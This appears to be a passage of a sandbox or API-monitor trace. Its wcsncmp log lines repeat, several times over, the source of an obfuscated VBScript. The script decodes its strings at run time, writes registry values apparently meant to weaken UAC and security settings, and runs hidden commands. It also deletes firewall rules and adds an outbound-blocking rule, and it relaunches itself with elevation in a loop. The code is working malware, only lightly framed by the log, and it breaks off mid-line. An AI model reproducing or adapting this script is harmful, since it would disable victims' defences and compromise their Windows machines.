bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.993] wcsncmp (_String1="BFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0222.993] wcsncmp (_String1="FHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.993] wcsncmp (_String1="HFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0222.993] wcsncmp (_String1="FEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.993] wcsncmp (_String1="EFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = 